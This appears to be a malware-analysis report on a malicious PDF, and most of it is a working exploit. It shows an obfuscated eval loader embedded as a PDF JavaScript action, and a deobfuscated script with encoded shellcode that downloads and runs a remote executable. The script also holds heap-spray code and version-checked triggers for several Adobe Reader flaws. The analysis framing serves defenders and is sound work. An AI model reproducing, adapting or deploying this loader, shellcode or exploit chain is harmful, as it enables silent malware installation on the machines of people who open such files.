var return_text="";var rand_key=0;for(var i=0;i<text.length;i++){if((text.length-i)>=parseInt(str_key.substring(rand_key,rand_key+1))){for(var i2=i+parseInt(str_key.substring(rand_key,rand_key+1))-1;i2>=i;i2--){return_text+=text.substring(i2,i2+1);}
i+=parseInt(str_key.substring(rand_key,rand_key+1))-1;}
else{return_text+=text.substring(i,i+1);}
rand_key++;if(rand_key>str_key.length-1)rand_key=0;}
app.sttr=return_text;}
if ('cxhuZ'=='BKspg') UFITjS();var ZfLQbq;var OiaIH;if ('VRdUfJ'=='TWhEU') hVlV();
p = 974;
p += app.doc.pageNum;
iLyTx(b, p);
function bnOy(){}
t = ("wdxw")[("dfsdfsdf", "eval")];
if ('CNPOlX'=='NZSLin') nrTgS='PqlKog';function LfyweL(){}var VDol='QOxu';
t('app.eval(app.sttr)');
function wiTNm(){}if ('XhAHM'=='MVfbAE') vQjN();
if ('STCy'=='nBBzeP') fabI='NMbUPo';var dnWCc='AZkx';
endstream
endobj
6 0 obj
<< /S /JavaScript /Type /Action /JS 5 0 R >>
endobj
xref
0 7
0000000000 65535 f
0000000042 00000 n
0000000110 00000 n
0000000174 00000 n
0000000261 00000 n
0000000414 00000 n
0000015366 00000 n
trailer
<< /Root 1 0 R /Size 7 >>
startxref
15427
%%EOF
|
|||
legacy_pdfkit_stage_000.js |
deobfuscated-js | reverse-chunk callee-key XOR decoded JavaScript at offset 0x19E | 4437 bytes |
SHA-256: 5156d36f3454b6065825e7043c2dcaad6d6599961f621bda64fcf88f3af45a41 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 15 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s). Carved artifact contains 1 long hex-escaped blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var pjuYr='%E8%00%00%00%00%5D%83%ED%05%31%C9%64%8B%71%30%8B%76%0C%8B%76%1C%8B%46%08%8B%7E%20%8B%36%66%39%4F%18%75%F2%BE%D2%00%00%00%01%EE%BF%BE%00%00%00%01%EF%E8%63%01%00%00%89%EA%81%C2%D2%00%00%00%52%68%80%00%00%00%FF%95%BE%00%00%00%89%EA%81%C2%D2%00%00%00%31%F6%01%C2%8A%9C%35%E3%01%00%00%80%FB%00%74%06%88%1C%32%46%EB%EE%C6%04%32%00%89%EA%81%C2%C5%01%00%00%52%FF%95%C2%00%00%00%89%EA%81%C2%D0%01%00%00%52%50%FF%95%C6%00%00%00%6A%00%6A%00%89%EA%81%C2%D2%00%00%00%52%89%EA%81%C2%EE%01%00%00%52%6A%00%FF%D0%6A%05%89%EA%81%C2%D2%00%00%00%52%FF%95%CA%00%00%00%6A%00%FF%95%CE%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%47%65%74%54%65%6D%70%50%61%74%68%41%00%4C%6F%61%64%4C%69%62%72%61%72%79%41%00%47%65%74%50%72%6F%63%41%64%64%72%65%73%73%00%57%69%6E%45%78%65%63%00%45%78%69%74%50%72%6F%63%65%73%73%00%BB%89%F2%89%F7%30%C0%AE%75%FD%29%F7%89%F9%31%C0%BE%3C%00%00%00%03%B5%9B%01%00%00%66%AD%03%85%9B%01%00%00%8B%70%78%83%C6%1C%03%B5%9B%01%00%00%8D%BD%9F%01%00%00%AD%03%85%9B%01%00%00%AB%AD%03%85%9B%01%00%00%50%AB%AD%03%85%9B%01%00%00%AB%5E%31%DB%AD%56%03%85%9B%01%00%00%89%C6%89%D7%51%FC%F3%A6%59%74%04%5E%43%EB%E9%5E%93%D1%E0%03%85%A7%01%00%00%31%F6%96%66%AD%C1%E0%02%03%85%9F%01%00%00%89%C6%AD%03%85%9B%01%00%00%C3%EB%10%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%89%85%9B%01%00%00%56%57%E8%58%FF%FF%FF%5F%5E%AB%01%CE%80%3E%BB%74%02%EB%ED%C3%55%52%4C%4D%4F%4E%2E%44%4C%4C%00%55%52%4C%44%6F%77%6E%6C%6F%61%64%54%6F%46%69%6C%65%41%00%55%73%65%72%33%32%2E%65%78%65%00';
function toUnicode(theString) {
if (theString.length % 2) theString += "\x00";
var unicodeString = '';
for (var i=0; i < theString.length; i+=2) {
var theUnicode1 = theString.charCodeAt(i).toString(16).toUpperCase();
if (theUnicode1.length==1) theUnicode1="0"+theUnicode1;
var theUnicode2 = theString.charCodeAt(i+1).toString(16).toUpperCase();
if (theUnicode2.length==1) theUnicode2="0"+theUnicode2;
theUnicode = '%u' + theUnicode2+theUnicode1;
unicodeString += theUnicode;
}
return unicodeString;
}
var AFZQijj = toUnicode(unescape(pjuYr)+app.fu+"&t=11"+unescape("%00"));
var disxx = toUnicode(unescape(pjuYr)+app.fu+"&t=12"+unescape("%00"));
var IhovpSoTn = toUnicode(unescape(pjuYr)+app.fu+"&t=13"+unescape("%00"));
function HStLzuwzp(KcwAxtL, wkLrcksc){
while(KcwAxtL.length*2<wkLrcksc){KcwAxtL+=KcwAxtL;}
KcwAxtL=KcwAxtL.substring(0,wkLrcksc/2);
return KcwAxtL;
}
function EXlhxzkec(){
var mxOxoMdcK=new Array();
var HIysMo=unescape(AFZQijj);
var FhQrpmvbR=HIysMo.length*2;
var YnQkUu=unescape("%u9090%u9090");
YnQkUu=HStLzuwzp(YnQkUu, 0x400000-(FhQrpmvbR+0x38));
var qyfZLxh=(0x0c0c0c0c-0x400000)/0x400000;
for(var TFXDkWF=0;TFXDkWF<qyfZLxh;TFXDkWF++){
mxOxoMdcK[TFXDkWF]=YnQkUu+HIysMo;
}
var fKzspx=unescape("%u0c0c%u0c0c");
while(fKzspx.length<44952){fKzspx+=fKzspx;}
this.collabStore=Collab.collectEmailInfo({subj:"",msg:fKzspx});
}
function QqfcZhH(){
pIqPpLkC=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
var HIysMo=unescape(disxx);
KHzcuaw=pIqPpLkC+HIysMo;
DxcGRMX=unescape("%u0A0A%u0A0A");
kQYkM=20;
MTApDmgn=kQYkM+KHzcuaw.length;
while(DxcGRMX.length<MTApDmgn){
DxcGRMX+=DxcGRMX;
}
BZQiBpxm=DxcGRMX.substring(0,MTApDmgn);
HSZBf=DxcGRMX.substring(0,DxcGRMX.length-MTApDmgn);
while(HSZBf.length+MTApDmgn<0x40000){
HSZBf=HSZBf+HSZBf+BZQiBpxm;
}
TjfdcK=new Array();
for(i=0;i<1400;i++){
TjfdcK[i]=HSZBf+KHzcuaw;
}
var DimosGA=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",DimosGA);
}
function PuAVwWdDo(){
var mxOxoMdcK=new Array();
if(app.doc.Collab.getIcon){
var HIysMo=unescape(IhovpSoTn);
var YnQkUu=unescape("%u9090%u9090");
YnQkUu=HStLzuwzp(YnQkUu, 0x400000-(HIysMo.length*2+0x38));
var TFXDkWF=(0x0c0c0c0c-0x400000)/0x400000;
for(var i=0;i<TFXDkWF;i++){
mxOxoMdcK[i]=YnQkUu+HIysMo;
}
var qXpbc=unescape("%09");
while(qXpbc.length<0x4000){qXpbc+=qXpbc;}
qXpbc="N."+qXpbc;
app.doc.Collab.getIcon(qXpbc);
}
}
vCJiv=app.plugIns;
var GfFdlpq=parseInt(app.viewerVersion.toString().charAt(0));
for(var i=0;i<vCJiv.length;i++){
if(vCJiv[i].name=='EScript'){
var vvbabd=vCJiv[i].version;
}
}
if ((vvbabd==9)||((GfFdlpq==8)&&(vvbabd<=8.12))) {
PuAVwWdDo();
} else if(vvbabd==7.1){
QqfcZhH();
} else if(((GfFdlpq==6)||(GfFdlpq==7))&&(vvbabd<7.11)) {
EXlhxzkec();
}
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.